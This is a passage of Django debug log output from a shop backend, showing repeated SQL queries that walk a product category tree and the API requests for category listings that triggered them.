"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:34:10,722 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:34:10,725 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:34:10,727 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:34:10] "GET /api/v1/categories/ HTTP/1.0" 200 8596 DEBUG 2019-12-13 13:34:17,477 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:34:17,487 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:34:17,491 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:34:17,495 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:34:17,498 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:34:17,501 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:34:17,503 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:34:17,505 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:34:17,508 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:34:17,510 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:34:17,513 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:34:17,516 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:34:17,519 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:34:17,521 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:34:17,524 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:34:17,527 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:34:17,530 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:34:17,532 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:34:17,534 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:34:17,537 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:34:17,539 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:34:17,542 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:34:17,544 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:34:17,546 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:34:17,548 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:34:17,551 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:34:17,553 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:34:17,555 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:34:17,558 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:34:17,560 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:34:17,562 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:34:17,565 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:34:17,567 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:34:17,570 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:34:17,572 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:34:17,575 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:34:17,577 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:34:17,580 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:34:17,582 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:34:17,584 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:34:17,586 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:34:17,589 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:34:17,591 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:34:17,593 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:34:17,596 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:34:17,598 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:34:17] "GET /api/v1/categories/ HTTP/1.0" 200 8596 DEBUG 2019-12-13 13:35:29,240 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 13:35:29,247 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 13:35:29] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 13:35:29,251 utils 11259 139831299618560 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:35:29,263 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:35:29,268 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:35:29,272 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:35:29,276 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:35:29,280 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:35:29,284 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:35:29,288 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:35:29,292 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:35:29,297 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:35:29,300 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:35:29,304 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:35:29,308 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:35:29,312 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:35:29,317 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:35:29,320 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" 